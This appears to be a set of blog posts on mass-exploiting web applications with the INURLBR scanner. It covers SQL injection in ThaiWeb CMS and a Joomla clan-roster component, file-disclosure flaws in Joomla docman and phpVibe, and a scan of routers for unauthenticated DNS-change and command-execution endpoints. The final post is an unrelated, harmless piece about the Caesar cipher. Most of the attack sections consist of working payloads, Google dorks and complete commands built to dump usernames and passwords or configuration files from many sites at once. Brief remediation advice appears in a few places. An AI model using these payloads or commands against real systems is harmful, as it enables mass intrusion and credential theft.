ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage.
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.

We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

Fail discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)

Description:
The vulnerabilities are located in the id_run value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable id_run parameter. The request method to inject the sql command is GET and the location of the issue is application-side.

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555

Release Date:
2015-07-23

Vulnerability Laboratory ID (VL-ID):
1555

Common Vulnerability Scoring System:
8.6

Vendor Homepage:
http://www.thaiweb.net/

Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"

PoC:

• http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
• http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

Admin Page:
www.target.com/_adminP/

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'YOU_DORK'
OR
--dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-a all
  we will use all the search engines available in the script

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.

   removes all gets the URL

SET OUTPUT FILE:
 -s ThaiWeb.txt 

SET TIPE VALIDATION:
-t 2
       2   The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
            It also establishes connection with the exploit through the get method.

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:    hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a

Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

OUTPUT PRINT:

ADMIN PAINEL:

COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

OUTPUT PRINT:

Source discovery: 
http://seclists.org/fulldisclosure/2015/Jul/109

Solution - Fix & Patch:
The security vulnerability can be patched by a secure parse and encode of the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the sql statement request via GET method.

How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection

How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

INURLBR searching for routers

In this short article we will use the INURLBR tool for searching routers in certain ip ranges. 

The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.

We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let's just filtering routers.

Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi

Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.

Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.

Example:
http://TARGET/{STRING_SUB_PROCESS}

http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?

http://200.16.3.***/tools_admin.asp

If the HTTP server return code 200 means that such a request has been successfully performed.

Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.

if(HTTP_CODE == 200){

VULN

}

Now let's create our command to run the tool INURLBR.

By setting command:

SET RANGE IP:
RANGE IP:

 --range Set range IP.

      Example: --range {range_start,rage_end}

      Usage:   --range '172.16.0.5,172.16.0.255'

OR

RANGE IP RANDOM:

 --range-rand Set amount of random ips.

      Example: --range-rand {rand}

      Usage:   --range-rand '50'

SET FILE OUTPUT:

-s vuln.txt

SET FILE SUB_PROCESS:

--sub-file  Subprocess performs an injection 

     strings in URLs found by the engine, via GET or POST.

     Example: --sub-file {youfile}

     Usage:   --sub-file exploits_get.txt

SET TYPE OF REQUEST -  SUB_PROCESS:

 --sub-get defines whether the strings coming from 

     --sub-file will be injected via GET.

     Usage:   --sub-get

SET VALIDATION HTTP CODE:

 --ifcode Valid results based on your return http code.

      Example: --ifcode {ifcode}

      Usage:   --ifcode 200

SET TIME-OUT:

 --time-out Timeout to exit the process.

      Example: --time-out {second}

      Usage:   --time-out 3

COMPLETE COMMAND:

php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200

print output:

Strings exploits used:

https://www.exploit-db.com/search/?order_by=date&order=desc&pg=1&action=search&description=d-link

All exploits cited already have packages fix.

Exploit_model: Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/

Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/

Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/

Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/

Exploit_model: D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/

Exploit_model: D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/

Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/

Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/

Exploit_model: D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link AP 3200 - Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/

Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/

Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/

Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link DSL-2750B ADSL Router - CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/

Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/

Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/

Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/

Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/

Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/

Exploit_model: D-Link DIR-645 1.03B08 - Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/

Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Exploring component of Joomla cms

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/

There is a get parameter untreated in the application "file=" which enables download files from the server.

Google Dork:
inurl:"/components/com_docman/dl2.php"

POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])

Internment such an application must use the native function of php base64_decode to access your files.

string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php

The application uses crypt 64 then we should do the same to get the server files.

injection string:
../../../../../../../target/www/configuration.php <= Not Ready

encoded string:
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'

SET OUTPUT FILE:
 -s dl2.txt 

SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:    base64(102030)
     Usage:
      --exploit-get 'user?id=base64(102030)'
  URL with inject get:
  http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'

OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='

SET FILTER 
Filter results in unique domains.
--unique

SET VALIDATION
Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'  --unique --ifcode 200

OR

php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='  --unique --ifcode 200


Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure

phpVibe ALL versions LFD vulnerability Exploring with inurlbr

LFD exploiting vulnerability in phpvibe

PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine

# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
http://0day.today/exploit/23877

Vulnerable file:
stream.php

POC:
http://target.tld/stream.php?file=../vibe_config.php@@media
http://target.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09

Code:
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

File parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed).
With simple request can get access to the database configuration file Mysql.

Example:
curl  'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

OUTPUT PRINT:

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork '"powered by phpvibe"'

SET OUTPUT FILE:
 -s telefone.txt 

SET EXPLOIT GET
--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

SET FILTER 
Filter results in unique domains.
--unique 

SET VALIDATION

Valid results based on your return http code. 

      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:

php inurlbr.php --dork '"powered by phpvibe"' -s telefone.txt  --exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' --unique --ifcode 200

OUTPUT PRINT:

Solution:
Improving validation of parameters passed to the application.

Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

EXPLOIT MASS Joomla  - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.

The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TIPE VALIDATION:
-t 3
       3   - The third type combine both first and second types:
              Then, of course, it also establishes connection with the exploit through the get method
              Demo: www.target.com.br{exploit}

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e 

hex(<br>) = 3c62723e

Example injection:

http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'

SET STRING VALIDATION:

Specify the string that will be used on the search script:

Example: -a {string}

Usage:   -a '<title>hello world</title>'

If specific value is found in the target he is considered vulnerable.

Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL:

php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

-a 'inurlbr_vuln'

PRINT PROCESS:

Cifra de César

  #Cifra de César em Python

 Eae seus putos, jh00n aqui novamente com vocês.

   Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma).

   A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.

•  Criptografando

            Chave 3
            Alfabeto: "abcdefghijklmnopqrstuvwxyz"
            Mensagem a ser criptografada: "aka"

            Neste caso você conta 3(Chave) casas a frente das letras "a","k","a" ficando assim: dnd.

•  Descriptografando

            Chave 3
            Mensagem a ser descriptografada: "dnd"

            Funciona basicamente ao contrario você só ira precisar da chave, neste caso você conta 3 casa
           para trás retornando a mensagem original: aka.


    Então decidir fazer um programa em Python que encripta  e decripta frases utilizando a Cifra de César.
https://github.com/jh00nbr/Python/blob/master/cifradecesar.py